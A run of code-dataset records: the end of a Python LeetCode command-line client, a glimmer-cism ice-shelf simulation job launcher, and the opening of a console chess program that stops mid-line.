result_received[index] = True\n\n if progress_callback:\n progress_callback([result_json[index]['state'] for index in range(num_ids)])\n\n time.sleep(1)\n\n return result_json\n\n def _report_test_run_submit_failures(self, result_json: dict, test_case: str) \\\n -> typing.Union[_TestRunResultFailure, None]:\n if result_json['run_success']:\n return None\n\n status_code = result_json['status_code']\n\n if status_code == 20:\n return _TestRunResultFailure(\n test_case=test_case,\n error='Compile error: {}'.format(result_json['compile_error']),\n code_output=[])\n if status_code == 15:\n return _TestRunResultFailure(\n test_case=test_case,\n error='Runtime error: {}'.format(result_json['runtime_error']),\n code_output=result_json['code_output'])\n return _TestRunResultFailure(\n test_case=test_case,\n error=_RUN_ERROR_STATUS_CODE.get(status_code, 'Unknown error code: {}'.format(status_code)),\n code_output=result_json['code_output']\n )\n\n def test_run(self, index: int, language: str, code: str, test_case: str = None,\n test_run_status_callback: typing.Callable[[typing.List[str]], None] = None) \\\n -> typing.Union[_TestRunResultSuccess, _TestRunResultFailure]:\n\n problem_item = self._find_problem_item(index)\n problem_description = self.problem(index)\n test_case = test_case or problem_description.sample_testcase\n\n test_run_status_json = self._submit_code(\n index=index,\n slug=problem_item.slug,\n endpoint=_Endpoints.run_code(problem_item.slug),\n language=language,\n code=code,\n test_case=test_case\n )\n if 'error' in test_run_status_json:\n return _TestRunResultFailure(test_case=test_case, error=test_run_status_json['error'], code_output=[])\n\n # LeetCode will run two processes, one 
generates the expected value, the other generates the result from\n # test run\n expected_json, actual_json = self._collect_submit_results(\n submit_ids=[test_run_status_json['interpret_expected_id'], test_run_status_json['interpret_id']],\n slug=problem_item.slug,\n progress_callback=test_run_status_callback\n )\n\n # We always assume the standard solution is working, i.e. expected_json is always successful\n failure = self._report_test_run_submit_failures(result_json=actual_json, test_case=test_case)\n if failure:\n return failure\n\n return _TestRunResultSuccess(\n test_case=test_case,\n expected=expected_json['code_answer'],\n expected_time=expected_json['status_runtime'],\n actual=actual_json['code_answer'],\n actual_time=actual_json['status_runtime'],\n code_output=actual_json['code_output']\n )\n\n def _report_submit_code_failures(self, result_json: dict) \\\n -> typing.Union[_SubmitResultFailure, None]:\n if result_json['run_success']:\n return None\n\n status_code = result_json['status_code']\n\n # Compile error\n if status_code == 20:\n return _SubmitResultFailure(\n error='Compile error: {}'.format(result_json['compile_error']),\n stdout=[],\n last_failed_test_case=None\n )\n if status_code == 15:\n return _SubmitResultFailure(\n error='Runtime error: {}'.format(result_json['runtime_error']),\n stdout=result_json['std_output'],\n last_failed_test_case=result_json['last_testcase']\n )\n return _SubmitResultFailure(\n error=_RUN_ERROR_STATUS_CODE.get(status_code, 'Unknown error code: {}'.format(status_code)),\n stdout=result_json['std_output'],\n last_failed_test_case=result_json['last_testcase']\n )\n\n def submit_code(self, index: int, language: str, source_code: str,\n submit_status_callback: typing.Callable[[typing.List[str]], None] = None) \\\n -> typing.Union[_SubmitResultAccepted, _SubmitResultWrongAnswer, _SubmitResultFailure]:\n\n problem_item = self._find_problem_item(index)\n # We read the problem in order to get the CSRF token\n self.problem(index)\n\n submit_status_json = self._submit_code(\n index=index,\n slug=problem_item.slug,\n endpoint=_Endpoints.submit_code(problem_item.slug),\n language=language,\n code=source_code,\n test_case=''\n )\n if 'error' in submit_status_json:\n # all namedtuple fields must be supplied\n return _SubmitResultFailure(error=submit_status_json['error'],\n stdout=[], last_failed_test_case=None)\n\n submit_result_json = self._collect_submit_results(\n submit_ids=[submit_status_json['submission_id']],\n slug=problem_item.slug,\n progress_callback=submit_status_callback\n )[0]\n\n failure = self._report_submit_code_failures(submit_result_json)\n if failure:\n return failure\n\n total_test_cases = submit_result_json['total_testcases']\n total_correct = submit_result_json['total_correct']\n if total_test_cases == total_correct:\n # Accepted\n return _SubmitResultAccepted(\n time=submit_result_json['status_runtime'],\n stdout=submit_result_json['std_output'],\n total_test_cases=total_test_cases\n )\n else:\n # Wrong answer\n return _SubmitResultWrongAnswer(\n total_test_cases=total_test_cases,\n total_correct=total_correct,\n stdout=submit_result_json['std_output'],\n last_failed_test_case=submit_result_json['input'],\n last_expected=submit_result_json['expected_output'],\n last_actual=submit_result_json['code_output'],\n test_results=submit_result_json['compare_result'],\n )\n\n\ndef _setup_logger(level=logging.INFO) -> None:\n handler = logging.StreamHandler(stream=sys.stderr)\n handler.setLevel(level)\n handler.setFormatter(FORMATTER)\n\n logger.addHandler(handler)\n\n\ndef _setup_cache() -> None:\n if not 
os.path.exists(CONFIG_DIRECTORY):\n logger.warning('Config directory not exist, creating {}'.format(CONFIG_DIRECTORY))\n os.makedirs(CONFIG_DIRECTORY, mode=0o700, exist_ok=True)\n file_cache_region.configure(\n backend='dogpile.cache.dbm',\n expiration_time=86400,\n arguments={\n 'filename': os.path.join(CONFIG_DIRECTORY, 'cache.dbm')\n }\n )\n\n\n@click.command()\n@click.argument(\"username\")\n@click.password_option(confirmation_prompt=False)\ndef login(username: str, password: str) -> None:\n if not username:\n raise RuntimeError('No user name provided')\n\n lc = LeetCode()\n if lc.is_authenticated():\n raise RuntimeError('Already logged in')\n\n lc.login(username, password)\n\n\n@click.command()\ndef info() -> None:\n lc = LeetCode()\n user_info = lc.user_information()\n problems_info = lc.problems_information()\n cprint('{:30s}'.format('User name:'), 'green', end='')\n cprint(user_info.name, 'red', end='')\n cprint(' [{}]'.format(\n 'SUBSCRIBED' if user_info.subscribed else 'NOT SUBSCRIBED'), 'blue'\n )\n cprint('{:30s}'.format('Number problems solved:'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.num_solved,\n problems_info.total_num,\n user_info.num_solved / problems_info.total_num * 100), 'red'\n )\n cprint(' {:26s}'.format('Easy'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.ac_easy,\n problems_info.num_easy,\n user_info.ac_easy / problems_info.num_easy * 100), 'red'\n )\n cprint(' {:26s}'.format('Medium'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.ac_medium,\n problems_info.num_medium,\n user_info.ac_medium / problems_info.num_medium * 100), 'red'\n )\n cprint(' {:26s}'.format('Hard'), 'green', end='')\n cprint('{}/{} ({:.2f}%)'.format(\n user_info.ac_hard,\n problems_info.num_hard,\n user_info.ac_hard / problems_info.num_hard * 100), 'red'\n )\n\n\n@click.command()\n@click.argument('index')\n@click.option('--language', default=None, help='Code defintion')\ndef problem(index: int, language: str) -> None:\n lc = LeetCode()\n # click is not respecting Python 3 type spec, have to cast\n problem = lc.problem(int(index))\n if language and language not in problem.code_definition:\n raise ValueError('Unsupported language {}, supported languages: {}'.format(\n language, problem.code_definition.keys()))\n\n print()\n cprint(' {}. 
{}'.format(problem.index, problem.title), 'white', attrs=['bold'])\n print()\n cprint(problem.description, 'white')\n print()\n\n if not language:\n if 'cpp' in problem.code_definition:\n language = 'cpp'\n else:\n language = next(iter(problem.code_definition.keys()))\n\n cprint(' Code definition:', 'white', attrs=['bold'], end='')\n cprint(' ({})'.format(language), 'yellow')\n print()\n cprint(problem.code_definition[language], 'white')\n print()\n\n cprint(' Default Test Sample:', 'white', attrs=['bold'])\n print()\n cprint(problem.sample_testcase, 'white')\n print()\n\n\ndef _prepare_post_code(index: str, source: str, language: str) -> typing.Tuple[int, str, str]:\n # From command line, index is string, we have to do the casting\n index = int(index)\n\n with open(source, 'r') as stream:\n source_code = stream.read()\n if not language:\n _, ext = os.path.splitext(source)\n if ext not in _LANGUAGE_EXT_MAPPER:\n raise KeyError(\n 'Unrecognized extension {}, known extensions {}'.format(ext, _LANGUAGE_EXT_MAPPER.keys()))\n language = _LANGUAGE_EXT_MAPPER[ext]\n\n return (index, source_code, language)\n\n\n@click.command()\n@click.argument('index')\n@click.argument('source')\n@click.option('--language', default=None, help='Language')\n@click.option('--test-input', default=None, help='Custom test input')\n# FIXME mutual exclusive test-input and test-input-file\n# @click.option('--test-input-file', default=None, help='Custom test input, read from file')\ndef test_run(index: int, source: str, language: str,\n test_input: str) -> None: # Click does not respect Python3 type spec\n index, source_code, language = _prepare_post_code(index, source, language)\n\n lc = LeetCode()\n if not lc.is_authenticated():\n raise RuntimeError('Test run requires login.')\n\n cprint(' Testing problem {}'.format(index), 'white', attrs=['bold'])\n print()\n\n result = lc.test_run(\n index=index,\n language=language,\n code=source_code,\n test_case=test_input\n )\n\n cprint(' Test case:', 'blue', attrs=['bold'])\n print()\n print(result.test_case)\n print()\n\n cprint(' Code output:', 'blue', attrs=['bold'])\n print()\n for line in result.code_output:\n print(line)\n print()\n\n if isinstance(result, _TestRunResultFailure):\n cprint(' ERROR: ', 'red', attrs=['bold'], end='')\n cprint(result.error, 'red')\n print()\n return\n\n cprint(' Expected: ', 'green', attrs=['bold'], end='')\n cprint(result.expected_time, 'white')\n print()\n for line in result.expected:\n cprint(line, 'blue')\n print()\n cprint(' Actual: ', 'green', attrs=['bold'], end='')\n cprint(result.actual_time, 'white')\n print()\n for line in result.actual:\n cprint(line, 'blue')\n print()\n\n\n@click.command()\n@click.argument('index')\n@click.argument('source')\n@click.option('--language', default=None, help='Language')\ndef submit(index: int, source: str, language: str) -> None:\n index, source_code, language = _prepare_post_code(index, source, language)\n\n lc = LeetCode()\n if not lc.is_authenticated():\n raise RuntimeError('Test run requires login.')\n\n cprint(' Submit problem {}'.format(index), 'white', attrs=['bold'])\n print()\n\n result = lc.submit_code(index=index, language=language, source_code=source_code)\n\n cprint(' STDOUT:', 'blue', attrs=['bold'])\n print()\n print(result.stdout)\n print()\n\n if isinstance(result, _SubmitResultAccepted):\n cprint(' ACCEPTED ', 'green', attrs=['bold'], end='')\n cprint(result.time, 'white')\n print()\n cprint(' Passed {} test cases.'.format(result.total_test_cases), 'blue', attrs=['bold'])\n return\n\n 
if isinstance(result, _SubmitResultFailure):\n cprint(' ERROR: ', 'red', attrs=['bold'], end='')\n cprint(result.error, 'red')\n print()\n\n elif isinstance(result, _SubmitResultWrongAnswer):\n cprint(' TEST CASES: ', 'blue', attrs=['bold'], end='')\n cprint(result.total_correct, 'red', attrs=['bold'], end='')\n print('/', end='')\n cprint(result.total_test_cases, 'red', end='')\n print()\n for index, ch in enumerate(result.test_results):\n if index % 40 == 0:\n print('\\n ', end='')\n if ch == '0':\n cprint('F', 'red', end='')\n else:\n cprint('.', 'green', end='')\n print()\n print()\n\n cprint(' WRONG ANSWER', 'red', attrs=['bold'])\n print()\n cprint(' Expected:', 'red')\n print()\n print(result.last_expected)\n print()\n cprint(' Actual:', 'red')\n print()\n print(result.last_actual)\n print()\n\n if result.last_failed_test_case:\n cprint(' Last failed test case:', 'red')\n print()\n print(result.last_failed_test_case)\n print()\n\n\n@click.command()\n@click.option('--difficulty', help='Difficulty (easy/medium/hard)')\n@click.option('--status', help='Status (intacted/tried/accepted)')\n@click.option('--sort', help='Sort key (index/difficulty/frequency)[-(asc/desc)]', default='index-asc')\ndef list(difficulty: int, status: str, sort: str) -> None:\n lc = LeetCode()\n problems = lc.problems()\n\n def _sort(problems: typing.List[_ProblemListItem]) -> typing.List[_ProblemListItem]:\n sort_keys = sort.lower().split('-')\n if len(sort_keys) == 1:\n sort_keys.append('asc')\n\n if sort_keys[0] not in ('index', 'difficulty', 'frequency') or sort_keys[1] not in ('asc', 'desc'):\n raise ValueError('Unexpected sort instruction: {}'.format(sort))\n\n if sort_keys[0] == 'index':\n problems.sort(key=lambda i: i.index, reverse=sort_keys[1] == 'desc')\n elif sort_keys[0] == 'difficulty':\n problems.sort(\n key=lambda i: i.statistical_info.total_accepts / i.statistical_info.total_submitted,\n # Unlike difficulty, a high accept rate implies an easier problem\n reverse=sort_keys[1] != 'desc'\n )\n problems.sort(key=lambda i: i.difficulty, reverse=sort_keys[1] == 'desc')\n elif sort_keys[0] == 'frequency':\n problems.sort(key=lambda i: i.statistical_info.frequency, reverse=sort_keys[1] == 'desc')\n\n return problems\n\n def _filter(problems: typing.List[_ProblemListItem]) -> typing.Generator[_ProblemListItem, None, None]:\n STATUS_MAPPER = {'intacted': '-', 'tried': '?', 'accepted': '*'}\n if status and not lc.is_authenticated():\n raise RuntimeError('Need login to see problem status')\n for item in problems:\n if difficulty and item.difficulty != {'easy': 1, 'medium': 2, 'hard': 3}[difficulty]:\n continue\n if status and _STATUS_NAME_MAPPER[item.status] != STATUS_MAPPER[status]:\n continue\n yield item\n\n cprint(_LIST_PROBLEM_FORMATTER.format('', 'Id', 'Title', 'Difficulty', 'Rate', 'Status'), 'white',\n attrs=['bold'])\n cprint('=' * len(_LIST_PROBLEM_FORMATTER.format('', '', '', '', '', '')), 'white', attrs=['bold'])\n count = 0\n for item in _filter(_sort(problems)):\n count += 1\n cprint(_PrintFormatter.STATUS.format(_STATUS_NAME_MAPPER[item.status]),\n color=_STATUS_COLOR_MAPPER[item.status], end='')\n cprint(_PrintFormatter.INDEX.format(str(item.index)),\n color='white', end='')\n cprint(_PrintFormatter.TITLE.format(item.title),\n color='white', end='')\n cprint(_PrintFormatter.DIFFICULTY.format(_DIFFICULTY_NAME_MAPPER[item.difficulty]),\n color=_DIFFICULTY_COLOR_MAPPER[item.difficulty], end='')\n cprint(_PrintFormatter.ACCEPTANCE_RATE.format('{:.2f}%'.format(item.statistical_info.total_accepts /\n 
item.statistical_info.total_submitted * 100)),\n color='yellow', end='')\n cprint(_PrintFormatter.SUBSCRIBE_REQUIRED.format('SUBSCRIBE' if item.paid_only else ''),\n color='cyan', attrs=['bold'], end='')\n print()\n cprint('\\n TOTAL PROBLEMS: ', 'white', end='')\n cprint('{:5d}'.format(count), 'red', attrs=['bold'])\n\n\n@click.command()\ndef logout() -> None:\n LeetCode().logout()\n\n\n@click.group()\ndef main() -> None:\n pass\n\n\nmain.add_command(login)\nmain.add_command(info)\nmain.add_command(list)\nmain.add_command(problem)\nmain.add_command(test_run)\nmain.add_command(submit)\nmain.add_command(logout)\n\nif __name__ == '__main__':\n _setup_logger()\n _setup_cache()\n main()\n","repo_name":"xis19/lcao","sub_path":"lcao.py","file_name":"lcao.py","file_ext":"py","file_size_in_byte":31920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21561391678","text":"import os\nimport sys\n\nfrom gcplume import *\nfrom submit_GC_job import *\n\ndef kickoff( email, walltime,unique_str, queue_mode ):\n\n j = LinearShelfJob()\n j.default_flwa = 1.0e-16\n j.uniform_acab = -1.2\n j.n = 30\n j.m = 20\n j.nlevel = 3\n j.tend = 200.0\n j.tstart = 0.0\n j.ice_dt = 0.1\n j.hx = 1000.0\n j.hy = 1000.0\n j.use_plume = 1\n j.plume_dt = 60.0\n j.otopg = -2000.0\n j.upthk = 600.0\n j.ifthk = 550.0\n j.randthk = 0.0\n\n j.plume = { 'plume_min_thickness' : 50.0,\n }\n\n j.gc = {'options' : {'flow_law' : 2,\n 'temperature' : 0,\n },\n 'boundary condition params' : {'tau_xy_0' : 50.0e+3,\n 'x_invariant' : False,\n 'use_lateral_stress_bc' : False,\n },\n 'Petermann shelf' : { 'air_temperature' : -20.0,\n 'accumulation_rate' : j.uniform_acab,\n },\n\n 'picard parameters' : {'small_vel' : 0.01,\n 'minres' : 1.0e-5,\n 'y_overrideres' : 1.0e-9,\n 'cvg_accel' : 1.25,\n },\n 'plume' : {'plume_const_bmlt' : False,\n 'plume_steadiness_tol' : 1.0e-5,\n },\n }\n\n\n oceantemps = [-2.0,-0.5, 0.0, 0.5]\n# oceantemps = [0.0]\n upvels = [-900.0, -1000.0, -1100.0]\n# upvels = [-1000.0]\n phis = [0.0]\n\n for t in oceantemps:\n for upvel in upvels:\n for phi in phis:\n\n j.name = 'pn_%.1fC_%.1fma_%.0fd_noslip_%s' % (t,upvel,phi,unique_str)\n \n jdir = os.path.join(os.path.expandvars('$GC_JOBS'),\n j.name)\n\n if (not(os.path.lexists(jdir))):\n os.mkdir(jdir)\n \n j.jobDir = jdir\n \n j.upvel = upvel\n j.plume = {'temptop' : t,\n 'tempbot' : t,\n 'salttop' : 34.765,\n 'saltbot' : 34.765,\n 'plume_min_thickness' : 25.0,\n 'phi' : phi}\n\n j.assertCanStage()\n j.serialize()\n submit_job(j,email, walltime,queue_mode)\n\nUSAGE = 'python kickoff_noslip_central.py <unique_str> <queue_mode>'\n\nif __name__ == '__main__':\n\n if (len(sys.argv) != 3 ):\n raise Exception(\"Call like: \\n %s\" % USAGE)\n unique_str = sys.argv[1]\n queue_mode = sys.argv[2]\n \n kickoff('gladish@cims.nyu.edu', '24:00:00',unique_str, 'q')\n\n","repo_name":"BackupTheBerlios/glimmer-cism-svn","sub_path":"glimmer-cism-lanl/branches/plume_integration2/tests/petermann/task_scripts/kickoff_noslip_central.py","file_name":"kickoff_noslip_central.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32538794872","text":"\r\nimport colorama\r\nfrom colorama import Fore,Back,Style\r\ncolorama.init()\r\n\r\n\r\nfield = [[' ', ' ', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', ' ', ' ', ], # create an empty matrix\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ], \r\n ['8', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' 
', ' ', '8', ], #i - строка, j - столбец \r\n ['7', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '7', ],\r\n ['6', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '6', ],\r\n ['5', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '5', ],\r\n ['4', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '4', ],\r\n ['3', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '3', ],\r\n ['2', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '2', ],\r\n ['1', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '1', ],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ],\r\n [' ', ' ', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', ' ', ' ' ]]\r\n\r\nboard = [[None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],] \r\n\r\nCONST_COLOR_BLACK = 1\r\nCONST_COLOR_WHITE = -1\r\n\r\n\r\n\r\n\r\ndict_field = {\r\n 'a1': (9, 2), 'b1': (9, 3), 'c1': (9, 4), 'd1': (9, 5), 'e1': (9, 6), 'f1': (9, 7), 'g1': (9, 8), 'h1': (9, 9),'a2': (8, 2), 'b2': (8, 3), 'c2': (8, 4), \r\n 'd2': (8, 5), 'e2': (8, 6), 'f2': (8, 7), 'g2': (8, 8), 'h2': (8, 9), 'a3': (7, 2), 'b3': (7, 3), 'c3': (7, 4),'d3': (7, 5), 'e3': (7, 6), 'f3': (7, 7),\r\n 'g3': (7, 8), 'h3': (7, 9), 'a4': (6, 2), 'b4': (6, 3), 'c4': (6, 4), 'd4': (6, 5), 'e4': (6, 6), 'f4': (6, 7),'g4': (6, 8), 'h4': (6, 9), 'a5': (5, 2), \r\n 'b5': (5, 3), 'c5': (5, 4), 'd5': (5, 5), 'e5': (5, 6), 'f5': (5, 7), 'g5': (5, 8), 'h5': (5, 9), 'a6': (4, 2),'b6': (4, 3), 'c6': (4, 4), 'd6': (4, 5),\r\n 'e6': (4, 6), 'f6': (4, 7), 'g6': (4, 8), 'h6': (4, 9), 'a7': (3, 2), 'b7': (3, 3), 'c7': (3, 4), 'd7': (3, 5),'e7': (3, 6), 'f7': (3, 7), 'g7': (3, 8),\r\n 'h7': (3, 9), 'a8': (2, 2), 'b8': (2, 3), 'c8': (2, 4), 'd8': (2, 5), 'e8': (2, 6), 'f8': (2, 7), 'g8': (2, 8),'h8': (2, 9)\r\n }\r\n\r\n\r\n\r\ndef create_figure(color, current_i, current_j,type):\r\n figure = {\r\n 'owner_color' : color,\r\n 'owner_current_i' : current_i,\r\n 'owner_current_j' : current_j, \r\n 'type' : type, \r\n }\r\n return figure \r\n\r\ndef create_black_pawn(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'black_pawn')\r\ndef create_white_pawn(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'white_pawn')\r\ndef create_rook(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'rook')\r\ndef create_knight(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'knight')\r\ndef create_bishop(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'bishop')\r\ndef create_queen(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'queen')\r\ndef create_king(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'king')\r\n\r\n\r\ndef black_pawn_check_moves(figure, i, j):\r\n if board[i][j] == None and (figure['owner_current_j'] == j):\r\n if (i - figure['owner_current_i'] == 2):\r\n if (figure['owner_current_i'] == 1) and board[i-1][j] == None:\r\n return True\r\n elif i - figure['owner_current_i'] == 1:\r\n return True\r\n else:\r\n return False\r\n\r\ndef black_pawn_check_attack(figure, i, j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color']:\r\n if 
figure['owner_current_j'] == j:\r\n            return False\r\n        if (i == figure['owner_current_i'] + 1) and (j == figure['owner_current_j'] + 1 or j == figure['owner_current_j'] - 1):\r\n            return True\r\n        else:\r\n            return False\r\n        \r\ndef white_pawn_check_moves(figure, i, j):\r\n    if board[i][j] == None and (figure['owner_current_j'] == j):\r\n        if (i - figure['owner_current_i'] == -2):\r\n            if (figure['owner_current_i'] == 6) and board[i+1][j] == None:  # the square passed over is one row below the target\r\n                return True\r\n                #field[i][j] = '♙'\r\n        elif i - figure['owner_current_i'] == -1:\r\n            return True\r\n        else:\r\n            return False\r\ndef white_pawn_check_attack(figure, i, j):\r\n    if board[i][j] == None:\r\n        return False\r\n    if board[i][j]['owner_color'] != figure['owner_color']:\r\n        if figure['owner_current_j'] == j:\r\n            return False\r\n        if (i == figure['owner_current_i'] - 1) and (j == figure['owner_current_j'] + 1 or j == figure['owner_current_j'] - 1):\r\n            return True\r\n        else:\r\n            return False\r\n     \r\n     \r\n#Rook\r\n\r\ndef rook_check_way(figure,i,j): \r\n    if i == figure['owner_current_i']: #moving right or left\r\n        if figure['owner_current_j'] < j:\r\n            for col in range(figure['owner_current_j'] + 1, j):  # range(), not a two-element tuple, so every square in between is checked\r\n                if board[i][col] != None:\r\n                    return False\r\n            return True\r\n        elif figure['owner_current_j'] > j:\r\n            for col in range(j + 1, figure['owner_current_j']):\r\n                if board[i][col] != None :\r\n                    return False\r\n            return True\r\n    elif j == figure['owner_current_j']: #moving down or up\r\n        if figure['owner_current_i'] < i:\r\n            for row in range(figure['owner_current_i'] + 1, i):\r\n                if board[row][j] != None:\r\n                    return False\r\n            return True\r\n        elif figure['owner_current_i'] > i:\r\n            for row in range(i + 1, figure['owner_current_i']):\r\n                if board[row][j] != None :\r\n                    return False\r\n            return True\r\n    \r\ndef rook_check_moves(figure,i,j):\r\n    if board[i][j] != None:\r\n        return False\r\n    elif rook_check_way(figure,i,j):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef rook_check_attack(figure,i,j):\r\n    if board[i][j] == None:\r\n        return False\r\n    if board[i][j]['owner_color'] != figure['owner_color'] and rook_check_way(figure,i,j):\r\n        return True\r\n    return False\r\n\r\n# Knight\r\ndef knight_check_moves(figure, i, j):\r\n    d_row = abs(figure['owner_current_i'] - i)\r\n    d_col = abs(figure['owner_current_j'] - j)\r\n    if ((d_row == 1 and d_col == 2) or (d_row == 2 and d_col == 1)) and board[i][j] == None:\r\n        return True\r\n    return False\r\n\r\ndef knight_check_attack(figure, i, j):\r\n    if board[i][j] == None:\r\n        return False\r\n    d_row = abs(figure['owner_current_i'] - i)\r\n    d_col = abs(figure['owner_current_j'] - j)\r\n    if (d_row == 1 and d_col == 2) or (d_row == 2 and d_col == 1):\r\n        if board[i][j]['owner_color'] != figure['owner_color']:\r\n            return True  \r\n    return False  \r\n# Bishop\r\n\r\ndef bishop_check_way(figure,i,j):\r\n    def go_up(num):\r\n        return num + 1\r\n    def go_down(num):\r\n        return num - 1 \r\n    d_row = abs(figure['owner_current_i'] - i)\r\n    d_col = abs(figure['owner_current_j'] - j)\r\n    if d_row != d_col:\r\n        return False\r\n    if i > figure['owner_current_i']:\r\n        i_mod = go_up\r\n    else:\r\n        i_mod = go_down\r\n    if j > figure['owner_current_j']:\r\n        j_mod = go_up\r\n    else:\r\n        j_mod = go_down    \r\n    target_i = figure['owner_current_i']\r\n    target_j = figure['owner_current_j']    \r\n    for m in range(d_row-1):\r\n        target_i = i_mod(target_i)\r\n        target_j = j_mod(target_j)\r\n        if board[target_i][target_j] != None:\r\n            return False\r\n    return True\r\n\r\ndef bishop_check_moves(figure,i,j):\r\n    if board[i][j] != None:\r\n        return False\r\n    
elif bishop_check_way(figure,i,j):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef bishop_check_attack(figure,i,j):\r\n    if board[i][j] == None:\r\n        return False\r\n    if board[i][j]['owner_color'] != figure['owner_color'] and bishop_check_way(figure,i,j):\r\n        return True\r\n    return False\r\n\r\n\r\n# Queen \r\n\r\ndef queen_check_way(figure,i,j):\r\n    if rook_check_way(figure,i,j) or bishop_check_way(figure,i,j):\r\n        return True\r\n    return False    \r\n\r\ndef queen_check_moves(figure,i,j):\r\n    if board[i][j] != None:\r\n        return False\r\n    elif queen_check_way(figure,i,j):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef queen_check_attack(figure,i,j):\r\n    if board[i][j] == None:\r\n        return False\r\n    if board[i][j]['owner_color'] != figure['owner_color'] and queen_check_way(figure,i,j):\r\n        return True\r\n    return False\r\n\r\n\r\n    \r\n# King\r\n\r\ndef king_check_way(figure,i,j):\r\n    if abs(figure['owner_current_i'] - i) > 1 or abs(figure['owner_current_j'] - j) > 1:  # 'or', not 'and': a king may never move more than one square on either axis\r\n        return False\r\n    if rook_check_way(figure,i,j) or bishop_check_way(figure,i,j):\r\n        return True\r\n    return False    \r\n\r\ndef king_check_moves(figure,i,j):\r\n    if board[i][j] != None:\r\n        return False\r\n    elif king_check_way(figure, i,j):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef king_check_attack(figure,i,j):\r\n    if board[i][j] == None:\r\n        return False\r\n    if board[i][j]['owner_color'] != figure['owner_color'] and king_check_way(figure,i,j):\r\n        return True\r\n    return False\r\n\r\n\r\ndict_figure_types = {\r\n    'black_pawn' : [black_pawn_check_moves,black_pawn_check_attack],\r\n    'white_pawn' : [white_pawn_check_moves,white_pawn_check_attack],\r\n    'rook' : [rook_check_moves,rook_check_attack],\r\n    'knight' : [knight_check_moves,knight_check_attack],\r\n    'bishop' : [bishop_check_moves,bishop_check_attack],\r\n    'queen' : [queen_check_moves,queen_check_attack],\r\n    'king' : [king_check_moves,king_check_attack]\r\n}\r\n\r\n\r\ndef board_to_field():\r\n    global field, board\r\n    for cell in dict_field.keys():\r\n        i_field = dict_field[cell][0]\r\n        j_field = dict_field[cell][1]\r\n        i_board = i_field - 2\r\n        j_board = j_field - 2\r\n        if board[i_board][j_board] == None:\r\n            field[i_field][j_field] = '.'\r\n        elif (board[i_board][j_board]['type']== 'black_pawn'):\r\n            field[i_field][j_field] = 'p'\r\n        elif (board[i_board][j_board]['type']== 'white_pawn'):\r\n            field[i_field][j_field] = 'P'    \r\n        elif (board[i_board][j_board]['type']== 'rook') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n            field[i_field][j_field] = 'r'  \r\n        elif (board[i_board][j_board]['type']== 'rook') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n            field[i_field][j_field] = 'R'  \r\n        elif (board[i_board][j_board]['type']== 'bishop') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n            field[i_field][j_field] = 'b'  \r\n        elif (board[i_board][j_board]['type']== 'bishop') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n            field[i_field][j_field] = 'B'\r\n        elif (board[i_board][j_board]['type']== 'knight') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n            field[i_field][j_field] = 'n'  \r\n        elif (board[i_board][j_board]['type']== 'knight') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n            field[i_field][j_field] = 'N'\r\n        elif (board[i_board][j_board]['type']== 'queen') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n            field[i_field][j_field] = 'q'  \r\n        elif (board[i_board][j_board]['type']== 'queen') and 
